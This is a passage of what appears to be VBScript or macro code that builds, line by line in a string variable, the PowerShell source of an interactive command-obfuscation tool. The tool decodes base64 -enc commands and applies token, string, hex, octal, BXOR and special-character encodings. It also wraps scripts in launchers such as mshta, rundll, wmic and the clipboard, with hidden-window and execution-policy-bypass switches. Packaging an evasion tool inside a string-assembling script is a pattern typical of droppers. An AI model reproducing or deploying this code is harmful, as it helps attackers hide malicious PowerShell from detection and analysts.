Ouzw = Ouzw + " = $UserInputOptionValue
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = $S"
Ouzw = Ouzw + "cript:ScriptBlock
"
Ouzw = Ouzw + "$Script:ObfuscatedCommandHistory = @()
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHis"
Ouzw = Ouzw + "tory += $Script:ScriptBlock
"
Ouzw = Ouzw + " $Script:CliSyntax = @()
"
Ouzw = Ouzw + " $Script:ExecutionC"
Ouzw = Ouzw + "ommands = @()
"
Ouzw = Ouzw + " $Script:LauncherApplied = $FALSE
"
Ouzw = Ouzw + "
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully set ScriptPat"
Ouzw = Ouzw + "h (as URL):" -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host $Script:ScriptPath -Fo"
Ouzw = Ouzw + "regroundColor Magenta
"
Ouzw = Ouzw + "}
ElseIf ((Get-Item $U"
Ouzw = Ouzw + "serInputOptionValue) -is [System.IO.DirectoryInfo]"
Ouzw = Ouzw + ")
{
"
Ouzw = Ouzw + " # ScriptPath does not exist.
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -"
Ouzw = Ouzw + "NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host ' Path is a directory inst"
Ouzw = Ouzw + "ead of a file (' -NoNewLine
"
Ouzw = Ouzw + " Write-Host "$UserInputOptionValue" -NoNe"
Ouzw = Ouzw + "wLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host ").`n" -NoNewLine
"
Ouzw = Ouzw + " }
Els"
Ouzw = Ouzw + "e
{
"
Ouzw = Ouzw + " # Read contents from user-input Scri"
Ouzw = Ouzw + "ptPath value.
Get-"
Ouzw = Ouzw + "ChildItem $UserInputOptionValue -ErrorAction Stop "
Ouzw = Ouzw + "| Out-Null
$Script"
Ouzw = Ouzw + ":ScriptBlock = [IO.File]::ReadAllText((Resolve-Pat"
Ouzw = Ouzw + "h $UserInputOptionValue))
"
Ouzw = Ouzw + "
# Set script-wide"
Ouzw = Ouzw + " variables for future reference.
"
Ouzw = Ouzw + " $Script:ScriptPath ="
Ouzw = Ouzw + " $UserInputOptionValue
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = $Script:S"
Ouzw = Ouzw + "criptBlock
$Script"
Ouzw = Ouzw + ":ObfuscatedCommandHistory = @()
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHistory +="
Ouzw = Ouzw + " $Script:ScriptBlock
"
Ouzw = Ouzw + " $Script:CliSyntax = @()
"
Ouzw = Ouzw + " $Script:ExecutionCommands"
Ouzw = Ouzw + " = @()
$Sc"
Ouzw = Ouzw + "ript:LauncherApplied = $FALSE
"
Ouzw = Ouzw + "
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully set ScriptPath:" -Fo"
Ouzw = Ouzw + "regroundColor Cyan
"
Ouzw = Ouzw + " Write-Host $Script:ScriptPath -ForegroundColor Ma"
Ouzw = Ouzw + "genta
}
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
# Scr"
Ouzw = Ouzw + "iptPath not found (failed Test-Path).
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine"
Ouzw = Ouzw + " -ForegroundColor Red
"
Ouzw = Ouzw + "Write-Host ' Path not found (' -NoNewLine
"
Ouzw = Ouzw + " Write-Host "$UserInputOptionVa"
Ouzw = Ouzw + "lue" -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host ").`n" -NoNewLine
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " 'scriptblock' {
"
Ouzw = Ouzw + " # Remove evenly paired {} '' or "" if user incl"
Ouzw = Ouzw + "udes it around their scriptblock input.
"
Ouzw = Ouzw + " ForEach($Char in @(@('{','}'),@('"',"
Ouzw = Ouzw + "'"'),@("'","'")))
{
"
Ouzw = Ouzw + " While($UserInputOptionValue."
Ouzw = Ouzw + "StartsWith($Char[0]) -AND $UserInputOptionValue.En"
Ouzw = Ouzw + "dsWith($Char[1]))
{
"
Ouzw = Ouzw + " $UserInputOptionValu"
Ouzw = Ouzw + "e = $UserInputOptionValue.SubString(1,$UserInputOp"
Ouzw = Ouzw + "tionValue.Length-2).Trim()
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " # Check if input is PowerShell encoded com"
Ouzw = Ouzw + "mand syntax so we can decode for scriptblock.
"
Ouzw = Ouzw + " If($UserInputOptionValue -Matc"
Ouzw = Ouzw + "h 'powershell(.exe | )\s*-(e |ec |en |enc |enco |e"
Ouzw = Ouzw + "ncod |encode)\s*["'']*[a-z=]')
"
Ouzw = Ouzw + " {
# Extract encod"
Ouzw = Ouzw + "ed command.
$EncodedCo"
Ouzw = Ouzw + "mmand = $UserInputOptionValue.SubString($UserInput"
Ouzw = Ouzw + "OptionValue.ToLower().IndexOf(' -e')+3)
"
Ouzw = Ouzw + " $EncodedCommand = $EncodedComman"
Ouzw = Ouzw + "d.SubString($EncodedCommand.IndexOf(' ')).Trim(" '"
Ouzw = Ouzw + "`"")
# Decode Unicode"
Ouzw = Ouzw + "-encoded $EncodedCommand
"
Ouzw = Ouzw + " $UserInputOptionValue = [System.Text.Encoding]:"
Ouzw = Ouzw + ":Unicode.GetString([System.Convert]::FromBase64Str"
Ouzw = Ouzw + "ing($EncodedCommand))
}
"
Ouzw = Ouzw + " # Set script-wide variables"
Ouzw = Ouzw + " for future reference.
$Sc"
Ouzw = Ouzw + "ript:ScriptPath = 'N/A'
"
Ouzw = Ouzw + " $Script:ScriptBlock = $"
Ouzw = Ouzw + "UserInputOptionValue
$Scri"
Ouzw = Ouzw + "pt:ObfuscatedCommand = $UserInputOptionVal"
Ouzw = Ouzw + "ue
$Script:ObfuscatedComma"
Ouzw = Ouzw + "ndHistory = @()
$Script:O"
Ouzw = Ouzw + "bfuscatedCommandHistory += $UserInputOptionValue
"
Ouzw = Ouzw + " $Script:CliSyntax "
Ouzw = Ouzw + " = @()
$Script:Execu"
Ouzw = Ouzw + "tionCommands = @()
"
Ouzw = Ouzw + " $Script:LauncherApplied = $FALSE
"
Ouzw = Ouzw + "
Write-Host "
Ouzw = Ouzw + ""`n`nSuccessfully set ScriptBlock:" -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host $Script"
Ouzw = Ouzw + ":ScriptBlock -ForegroundColor Magenta
"
Ouzw = Ouzw + " }
'emptyvalue' {
"
Ouzw = Ouzw + " # No OPTIONVALUE was entered af"
Ouzw = Ouzw + "ter OPTIONNAME.
$HasError "
Ouzw = Ouzw + "= $TRUE
Write-Host "`n`nER"
Ouzw = Ouzw + "ROR:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host ' No value was entered afte"
Ouzw = Ouzw + "r' -NoNewLine
Write-Host '"
Ouzw = Ouzw + " SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host '.' -No"
Ouzw = Ouzw + "NewLine
}
"
Ouzw = Ouzw + "default {Write-Error "An invalid OPTIONNAME ($User"
Ouzw = Ouzw + "InputOptionName) was passed to switch block."; Exi"
Ouzw = Ouzw + "t}
}
}
Els"
Ouzw = Ouzw + "e
{
$HasError = $TRUE
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine"
Ouzw = Ouzw + " -ForegroundColor Red
Write-Host '"
Ouzw = Ouzw + " OPTIONNAME' -NoNewLine
Write-Host"
Ouzw = Ouzw + " " $UserInputOptionName" -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host " is not a sett"
Ouzw = Ouzw + "able option." -NoNewLine
}
"
Ouzw = Ouzw + " If($HasError)
{
"
Ouzw = Ouzw + "Write-Host "`n Correct syntax is" -NoNewLine"
Ouzw = Ouzw + "
Write-Host ' SET OPTIONNAME VALUE"
Ouzw = Ouzw + "' -NoNewLine -ForegroundColor Green
"
Ouzw = Ouzw + " Write-Host '.' -NoNewLine
"
Ouzw = Ouzw + " Write-Host "`n Enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host ' SHOW OPTIONS' -NoNewLine -For"
Ouzw = Ouzw + "egroundColor Yellow
Write-Host ' f"
Ouzw = Ouzw + "or more details.'
}
}
"
Ouzw = Ouzw + "ElseIf(($AcceptableInput -Contains $UserInput) -OR"
Ouzw = Ouzw + " ($OverrideAcceptableInput))
{
"
Ouzw = Ouzw + " # User input matches $AcceptableInput extracted f"
Ouzw = Ouzw + "rom the current $Menu, so decide if:
#"
Ouzw = Ouzw + " 1) an obfuscation function needs to be called and"
Ouzw = Ouzw + " remain in current interactive prompt, or
"
Ouzw = Ouzw + " # 2) return value to enter into a new interact"
Ouzw = Ouzw + "ive prompt.
# Format breadcrumb trail"
Ouzw = Ouzw + " to successfully retrieve the next interactive pro"
Ouzw = Ouzw + "mpt.
$UserInput = $BreadCrumb.Trim('\'"
Ouzw = Ouzw + ").Replace('\','_') + '_' + $UserInput
"
Ouzw = Ouzw + "If($BreadCrumb.StartsWith('\')) {$UserInput = '_' "
Ouzw = Ouzw + "+ $UserInput}
# If the current select"
Ouzw = Ouzw + "ion contains a command to execute then continue. O"
Ouzw = Ouzw + "therwise return to go to another menu.
"
Ouzw = Ouzw + " If($SelectionContainsCommand)
{
"
Ouzw = Ouzw + " # Make sure user has entered command or"
Ouzw = Ouzw + " path to script.
If($Script:Obfusc"
Ouzw = Ouzw + "atedCommand -ne $NULL)
{
"
Ouzw = Ouzw + " # Iterate through lines in $Menu to ext"
Ouzw = Ouzw + "ract command for the current selection in $UserInp"
Ouzw = Ouzw + "ut.
ForEach($Line in $Menu)
"
Ouzw = Ouzw + " {
If($Li"
Ouzw = Ouzw + "ne[1].Trim(' ') -eq $UserInput.SubString($UserInpu"
Ouzw = Ouzw + "t.LastIndexOf('_')+1)) {$CommandToExec = $Line[3];"
Ouzw = Ouzw + " Continue}
}
"
Ouzw = Ouzw + " If(!$OverrideAcceptableInput)
"
Ouzw = Ouzw + " {
# Extract arguments "
Ouzw = Ouzw + "from $CommandToExec.
$Func"
Ouzw = Ouzw + "tion = $CommandToExec[0]
$"
Ouzw = Ouzw + "Token = $CommandToExec[1]
"
Ouzw = Ouzw + " $ObfLevel = $CommandToExec[2]
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + "{
# Overload above argumen"
Ouzw = Ouzw + "ts if $OverrideAcceptableInput is $TRUE, and extra"
Ouzw = Ouzw + "ct $Function from $BreadCrumb
"
Ouzw = Ouzw + " Switch($BreadCrumb.ToLower())
"
Ouzw = Ouzw + " {
'\launcher\p"
Ouzw = Ouzw + "s' {$Function = 'Out-PowerShellLauncher'; $O"
Ouzw = Ouzw + "bfLevel = 1}
'\launche"
Ouzw = Ouzw + "r\cmd' {$Function = 'Out-PowerShellLauncher';"
Ouzw = Ouzw + " $ObfLevel = 2}
'\laun"
Ouzw = Ouzw + "cher\wmic' {$Function = 'Out-PowerShellLaunche"
Ouzw = Ouzw + "r'; $ObfLevel = 3}
'\l"
Ouzw = Ouzw + "auncher\rundll' {$Function = 'Out-PowerShellLaun"
Ouzw = Ouzw + "cher'; $ObfLevel = 4}
"
Ouzw = Ouzw + "'\launcher\var+' {$Function = 'Out-PowerShellL"
Ouzw = Ouzw + "auncher'; $ObfLevel = 5}
"
Ouzw = Ouzw + " '\launcher\stdin+' {$Function = 'Out-PowerShe"
Ouzw = Ouzw + "llLauncher'; $ObfLevel = 6}
"
Ouzw = Ouzw + " '\launcher\clip+' {$Function = 'Out-Power"
Ouzw = Ouzw + "ShellLauncher'; $ObfLevel = 7}
"
Ouzw = Ouzw + " '\launcher\var++' {$Function = 'Out-Po"
Ouzw = Ouzw + "werShellLauncher'; $ObfLevel = 8}
"
Ouzw = Ouzw + " '\launcher\stdin++' {$Function = 'Out"
Ouzw = Ouzw + "-PowerShellLauncher'; $ObfLevel = 9}
"
Ouzw = Ouzw + " '\launcher\clip++' {$Function = '"
Ouzw = Ouzw + "Out-PowerShellLauncher'; $ObfLevel = 10}
"
Ouzw = Ouzw + " '\launcher\rundll++' {$Function"
Ouzw = Ouzw + " = 'Out-PowerShellLauncher'; $ObfLevel = 11}
"
Ouzw = Ouzw + " '\launcher\mshta++' {$Func"
Ouzw = Ouzw + "tion = 'Out-PowerShellLauncher'; $ObfLevel = 12}
"
Ouzw = Ouzw + " default {Write-Error "A"
Ouzw = Ouzw + "n invalid value ($($BreadCrumb.ToLower())) was pas"
Ouzw = Ouzw + "sed to switch block for setting `$Function when `$"
Ouzw = Ouzw + "OverrideAcceptableInput -eq `$TRUE."; Exit}
"
Ouzw = Ouzw + " }
# Extr"
Ouzw = Ouzw + "act $ObfLevel from first element in array (in case"
Ouzw = Ouzw + " 0th element is used for informational purposes), "
Ouzw = Ouzw + "and extract $Token from $BreadCrumb.
"
Ouzw = Ouzw + " $ObfLevel = $Menu[1][3][2]
"
Ouzw = Ouzw + " $Token = $UserInput.SubString($UserInp"
Ouzw = Ouzw + "ut.LastIndexOf('_')+1)
}
"
Ouzw = Ouzw + " # Convert ObfuscatedCommand (strin"
Ouzw = Ouzw + "g) to ScriptBlock for next obfuscation function.
"
Ouzw = Ouzw + " If(!($Script:LauncherApplied))
"
Ouzw = Ouzw + " {
$Obf"
Ouzw = Ouzw + "CommandScriptBlock = $ExecutionContext.InvokeComma"
Ouzw = Ouzw + "nd.NewScriptBlock($Script:ObfuscatedCommand)
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + " # Validate that user has set SCRIPTPATH or"
Ouzw = Ouzw + " SCRIPTBLOCK (by seeing if $Script:ObfuscatedComma"
Ouzw = Ouzw + "nd is empty).
If($Script:Obfus"
Ouzw = Ouzw + "catedCommand -eq '')
{
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Red
Wri"
Ouzw = Ouzw + "te-Host " Cannot execute obfuscation commands with"
Ouzw = Ouzw + "out setting ScriptPath or ScriptBlock values in SH"
Ouzw = Ouzw + "OW OPTIONS menu. Set these by executing" -NoNewLin"
Ouzw = Ouzw + "e
Write-Host ' SET SCRIPTB"
Ouzw = Ouzw + "LOCK script_block_or_command' -NoNewLine -Foregrou"
Ouzw = Ouzw + "ndColor Green
Write-Host '"
Ouzw = Ouzw + " or' -NoNewLine
Write-Host"
Ouzw = Ouzw + " ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Green
W"
Ouzw = Ouzw + "rite-Host '.'
Continue
"
Ouzw = Ouzw + " }
# Save cur"
Ouzw = Ouzw + "rent ObfuscatedCommand to see if obfuscation was s"
Ouzw = Ouzw + "uccessful (i.e. no warnings prevented obfuscation "
Ouzw = Ouzw + "from occurring).
$ObfuscatedCo"
Ouzw = Ouzw + "mmandBefore = $Script:ObfuscatedCommand
"
Ouzw = Ouzw + " $CmdToPrint = $NULL
"
Ouzw = Ouzw + " If($Script:LauncherApplied)
{"
Ouzw = Ouzw + "
If($Function -eq 'Out-Pow"
Ouzw = Ouzw + "erShellLauncher')
{
"
Ouzw = Ouzw + " $ErrorMessage = ' You have a"
Ouzw = Ouzw + "lready applied a launcher to ObfuscatedCommand.'
"
Ouzw = Ouzw + " }
E"
Ouzw = Ouzw + "lse
{
"
Ouzw = Ouzw + " $ErrorMessage = ' You cannot obfuscate aft"
Ouzw = Ouzw + "er applying a Launcher to ObfuscatedCommand.'
"
Ouzw = Ouzw + " }
Wri"
Ouzw = Ouzw + "te-Host "`n`nERROR:" -NoNewLine -ForegroundColor R"
Ouzw = Ouzw + "ed
Write-Host $ErrorMessag"
Ouzw = Ouzw + "e -NoNewLine
Write-Host "`"
Ouzw = Ouzw + "n Enter" -NoNewLine
"
Ouzw = Ouzw + "Write-Host ' UNDO' -NoNewLine -ForegroundColor Yel"
Ouzw = Ouzw + "low
Write-Host " to remove"
Ouzw = Ouzw + " the launcher from ObfuscatedCommand.`n" -NoNewLin"
Ouzw = Ouzw + "e
}
Else
"
Ouzw = Ouzw + " {
# Swi"
Ouzw = Ouzw + "tch block to route to the correct function.
"
Ouzw = Ouzw + " Switch($Function)
"
Ouzw = Ouzw + " {
'Out-Obfus"
Ouzw = Ouzw + "catedTokenCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-Obfuscat"
Ouzw = Ouzw + "edTokenCommand -ScriptBlock $ObfCommandScri"
Ouzw = Ouzw + "ptBlock $Token $ObfLevel
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-ObfuscatedTokenCommand"
Ouzw = Ouzw + " -ScriptBlock "," '$Token' $ObfLevel")
"
Ouzw = Ouzw + " }
'Ou"
Ouzw = Ouzw + "t-ObfuscatedTokenCommandAll' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-O"
Ouzw = Ouzw + "bfuscatedTokenCommand -ScriptBlock $ObfComm"
Ouzw = Ouzw + "andScriptBlock
$Cm"
Ouzw = Ouzw + "dToPrint = @("Out-ObfuscatedTokenCommand -ScriptBl"
Ouzw = Ouzw + "ock ","")
}
"
Ouzw = Ouzw + " 'Out-ObfuscatedStringCommand' "
Ouzw = Ouzw + " {
$Script:Obfu"
Ouzw = Ouzw + "scatedCommand = Out-ObfuscatedStringCommand "
Ouzw = Ouzw + "-ScriptBlock $ObfCommandScriptBlock $ObfLevel
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-O"
Ouzw = Ouzw + "bfuscatedStringCommand -ScriptBlock "," $ObfLevel""
Ouzw = Ouzw + ")
}
"
Ouzw = Ouzw + " 'Out-EncodedAsciiCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCo"
Ouzw = Ouzw + "mmand = Out-EncodedAsciiCommand -ScriptB"
Ouzw = Ouzw + "lock $ObfCommandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-EncodedAs"
Ouzw = Ouzw + "ciiCommand -ScriptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'O"
Ouzw = Ouzw + "ut-EncodedHexCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-"
Ouzw = Ouzw + "EncodedHexCommand -ScriptBlock $ObfCom"
Ouzw = Ouzw + "mandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-EncodedHexCommand -Sc"
Ouzw = Ouzw + "riptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'Out-EncodedOcta"
Ouzw = Ouzw + "lCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-EncodedOctalCo"
Ouzw = Ouzw + "mmand -ScriptBlock $ObfCommandScriptBloc"
Ouzw = Ouzw + "k -PassThru
$CmdTo"
Ouzw = Ouzw + "Print = @("Out-EncodedOctalCommand -ScriptBlock ","
Ouzw = Ouzw + "" -PassThru")
}
"
Ouzw = Ouzw + " 'Out-EncodedBinaryCommand' "
Ouzw = Ouzw + " {
$Script:"
Ouzw = Ouzw + "ObfuscatedCommand = Out-EncodedBinaryCommand "
Ouzw = Ouzw + " -ScriptBlock $ObfCommandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("O"
Ouzw = Ouzw + "ut-EncodedBinaryCommand -ScriptBlock "," -PassThru"
Ouzw = Ouzw + "")
}
"
Ouzw = Ouzw + " 'Out-SecureStringCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedC"
Ouzw = Ouzw + "ommand = Out-SecureStringCommand -Script"
Ouzw = Ouzw + "Block $ObfCommandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-SecureSt"
Ouzw = Ouzw + "ringCommand -ScriptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'"
Ouzw = Ouzw + "Out-EncodedBXORCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out"
Ouzw = Ouzw + "-EncodedBXORCommand -ScriptBlock $ObfCo"
Ouzw = Ouzw + "mmandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-EncodedBXORCommand -"
Ouzw = Ouzw + "ScriptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'Out-EncodedSp"
Ouzw = Ouzw + "ecialCharOnlyCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-EncodedSpeci"
Ouzw = Ouzw + "alCharOnlyCommand -ScriptBlock $ObfCommandScriptBl"
Ouzw = Ouzw + "ock -PassThru
$Cmd"
Ouzw = Ouzw + "ToPrint = @("Out-EncodedSpecialCharOnlyCommand -Sc"
Ouzw = Ouzw + "riptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'Out-EncodedWhit"
Ouzw = Ouzw + "espaceCommand' {
$"
Ouzw = Ouzw + "Script:ObfuscatedCommand = Out-EncodedWhitespaceCo"
Ouzw = Ouzw + "mmand -ScriptBlock $ObfCommandScriptBlock -Pa"
Ouzw = Ouzw + "ssThru
$CmdToPrint"
Ouzw = Ouzw + " = @("Out-EncodedWhitespaceCommand -ScriptBlock ","
Ouzw = Ouzw + "" -PassThru")
}
"
Ouzw = Ouzw + " 'Out-PowerShellLauncher' "
Ouzw = Ouzw + " {
# Extrac"
Ouzw = Ouzw + "t numbers from string so we can output proper flag"
Ouzw = Ouzw + " syntax in ExecutionCommands history.
"
Ouzw = Ouzw + " $SwitchesAsStringArray = [char"
Ouzw = Ouzw + "[]]$Token | Sort-Object -Unique | Where-Object {$_"
Ouzw = Ouzw + " -ne ' '}
"
Ouzw = Ouzw + " If($SwitchesAsStringArray"
Ouzw = Ouzw + " -Contains '0')
{
"
Ouzw = Ouzw + " $CmdToPrint = "
Ouzw = Ouzw + "@("Out-PowerShellLauncher -ScriptBlock "," $ObfLev"
Ouzw = Ouzw + "el")
}
"
Ouzw = Ouzw + " Else
"
Ouzw = Ouzw + " {
$Has"
Ouzw = Ouzw + "WindowStyle = $FALSE
"
Ouzw = Ouzw + " $SwitchesToPrint = @()
"
Ouzw = Ouzw + " ForEach($Value in $SwitchesAsStrin"
Ouzw = Ouzw + "gArray)
{
"
Ouzw = Ouzw + " Switch($Value)"
Ouzw = Ouzw + "
{
"
Ouzw = Ouzw + " 1 {$SwitchesT"
Ouzw = Ouzw + "oPrint += '-NoExit'}
"
Ouzw = Ouzw + " 2 {$SwitchesToPrint += '-NonInterac"
Ouzw = Ouzw + "tive'}
"
Ouzw = Ouzw + " 3 {$SwitchesToPrint += '-NoLogo'}
"
Ouzw = Ouzw + " 4 {$SwitchesToPrint +"
Ouzw = Ouzw + "= '-NoProfile'}
"
Ouzw = Ouzw + " 5 {$SwitchesToPrint += '-Command'}
"
Ouzw = Ouzw + " 6 {If(!$Has"
Ouzw = Ouzw + "WindowStyle) {$SwitchesToPrint += '-WindowStyle Hi"
Ouzw = Ouzw + "dden'; $HasWindowStyle = $TRUE}}
"
Ouzw = Ouzw + " 7 {$SwitchesToPrint += "
Ouzw = Ouzw + "'-ExecutionPolicy Bypass'}
"
Ouzw = Ouzw + " 8 {$SwitchesToPrint += '-Wow6"
Ouzw = Ouzw + "4'}
de"
Ouzw = Ouzw + "fault {Write-Error "An invalid `$SwitchesAsString "
Ouzw = Ouzw + "value ($Value) was passed to switch block."; Exit;"
Ouzw = Ouzw + "}
}
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + " $SwitchesToPrint = $SwitchesToP"
Ouzw = Ouzw + "rint -Join ' '
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-PowerShellLauncher -ScriptBl"
Ouzw = Ouzw + "ock "," $SwitchesToPrint $ObfLevel")
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + "
$Script:Obfusc"
Ouzw = Ouzw + "atedCommand = Out-PowerShellLauncher -ScriptBlock "
Ouzw = Ouzw + "$ObfCommandScriptBlock -SwitchesAsString $Token $O"
Ouzw = Ouzw + "bfLevel
"
Ouzw = Ouzw + " # Only set LauncherApplied "
Ouzw = Ouzw + "to true if before/after are different (i.e. no war"
Ouzw = Ouzw + "nings prevented launcher from being applied).
"
Ouzw = Ouzw + " If($ObfuscatedCommandB"
Ouzw = Ouzw + "efore -ne $Script:ObfuscatedCommand)
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " $Script:LauncherApplied = $TRUE
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + " }
default {Write-Erro"
Ouzw = Ouzw + "r "An invalid `$Function value ($Function) was pas"
Ouzw = Ouzw + "sed to switch block."; Exit;}
"
Ouzw = Ouzw + " }
If(($Script:Obfusca"
Ouzw = Ouzw + "tedCommand -ceq $ObfuscatedCommandBefore) -AND ($M"
Ouzw = Ouzw + "enuName.StartsWith('_Token_')))
"
Ouzw = Ouzw + " {
Write-Host "`n"
Ouzw = Ouzw + "WARNING:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " There were not an"
Ouzw = Ouzw + "y" -NoNewLine
If($Brea"
Ouzw = Ouzw + "dCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).T"
Ouzw = Ouzw + "oLower() -ne 'all') {Write-Host " $($BreadCrumb.Su"
Ouzw = Ouzw + "bString($BreadCrumb.LastIndexOf('\')+1))" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Yellow}
"
Ouzw = Ouzw + " Write-Host " tokens to further obfuscate, so"
Ouzw = Ouzw + " nothing changed."
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # Add to $Script:Obfus"
Ouzw = Ouzw + "catedCommandHistory if a change took place for the"
Ouzw = Ouzw + " current ObfuscatedCommand.
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHistory += , $Scrip"
Ouzw = Ouzw + "t:ObfuscatedCommand
"
Ouzw = Ouzw + " # Convert UserInput to CLI syntax to store in C"
Ouzw = Ouzw + "liSyntax variable if obfuscation occurred.
"
Ouzw = Ouzw + " $CliSyntaxCurrentCommand = $U"
Ouzw = Ouzw + "serInput.Trim('_ ').Replace('_','\')
"
Ouzw = Ouzw + " # Add CLI command syntax to $S"
Ouzw = Ouzw + "cript:CliSyntax to maintain a history of commands "
Ouzw = Ouzw + "to arrive at current obfuscated command for CLI sy"
Ouzw = Ouzw + "ntax.
$Script:CliSynta"
Ouzw = Ouzw + "x += $CliSyntaxCurrentCommand
"
Ouzw = Ouzw + " # Add execution syntax to $Script:Executi"
Ouzw = Ouzw + "onCommands to maintain a history of commands to ar"
Ouzw = Ouzw + "rive at current obfuscated command.
"
Ouzw = Ouzw + " $Script:ExecutionCommands += ($CmdTo"
Ouzw = Ouzw + "Print[0] + '$ScriptBlock' + $CmdToPrint[1])
"
Ouzw = Ouzw + " # Output syntax of CLI synt"
Ouzw = Ouzw + "ax and full command we executed in above Switch bl"
Ouzw = Ouzw + "ock.
Write-Host "`nExe"
Ouzw = Ouzw + "cuted:`t"
Write-Host ""
Ouzw = Ouzw + " CLI: " -NoNewline
W"
Ouzw = Ouzw + "rite-Host $CliSyntaxCurrentCommand -ForegroundColo"
Ouzw = Ouzw + "r Cyan
Write-Host " F"
Ouzw = Ouzw + "ULL: " -NoNewline
Writ"
Ouzw = Ouzw + "e-Host $CmdToPrint[0] -NoNewLine -ForegroundColor "
Ouzw = Ouzw + "Cyan
Write-Host '$Scri"
Ouzw = Ouzw + "ptBlock' -NoNewLine -ForegroundColor Magenta
"
Ouzw = Ouzw + " Write-Host $CmdToPrint[1] -"
Ouzw = Ouzw + "ForegroundColor Cyan
"
Ouzw = Ouzw + "# Output obfuscation result.
"
Ouzw = Ouzw + " Write-Host "`nResult:`t"
"
Ouzw = Ouzw + " Out-ScriptContents $Script:ObfuscatedCom"
Ouzw = Ouzw + "mand -PrintWarning
}
"
Ouzw = Ouzw + " }
}
}
"
Ouzw = Ouzw + " Else
{
Retu"
Ouzw = Ouzw + "rn $UserInput
}
}
Else"
Ouzw = Ouzw + "
{
If ($MenuInputOptionsSho"
Ouzw = Ouzw + "wHelp[0] -Contains $UserInput) {Show-HelpMenu}"
Ouzw = Ouzw + "
ElseIf($MenuInputOptionsShowOptions[0"
Ouzw = Ouzw + "] -Contains $UserInput) {Show-OptionsMenu}
"
Ouzw = Ouzw + " ElseIf($TutorialInputOptions[0] -Con"
Ouzw = Ouzw + "tains $UserInput) {Show-Tutorial}
Else"
Ouzw = Ouzw + "If($ClearScreenInputOptions[0] -Contains $Use"
Ouzw = Ouzw + "rInput) {Clear-Host}
# For Version 1.0"
Ouzw = Ouzw + " ASCII art is not necessary.
#ElseIf($"
Ouzw = Ouzw + "ShowAsciiArtInputOptions[0] -Contains $UserInp"
Ouzw = Ouzw + "ut) {Show-AsciiArt -Random}
ElseIf($Re"
Ouzw = Ouzw + "setObfuscationInputOptions[0] -Contains $UserInput"
Ouzw = Ouzw + ")
{
If(($Script:Obfusc"
Ouzw = Ouzw + "atedCommand -ne $NULL) -AND ($Script:ObfuscatedCom"
Ouzw = Ouzw + "mand.Length -eq 0))
{
"
Ouzw = Ouzw + " Write-Host "`n`nWARNING:" -NoNewLine -Fore"
Ouzw = Ouzw + "groundColor Red
Write-Host " O"
Ouzw = Ouzw + "bfuscatedCommand has not been set. There is nothin"
Ouzw = Ouzw + "g to reset."
}
Els"
Ouzw = Ouzw + "eIf($Script:ObfuscatedCommand -ceq $Script:ScriptB"
Ouzw = Ouzw + "lock)
{
Write-"
Ouzw = Ouzw + "Host "`n`nWARNING:" -NoNewLine -ForegroundColor Re"
Ouzw = Ouzw + "d
Write-Host " No obfuscation "
Ouzw = Ouzw + "has been applied to ObfuscatedCommand. There is no"
Ouzw = Ouzw + "thing to reset."
}
"
Ouzw = Ouzw + " Else
{
$Scrip"
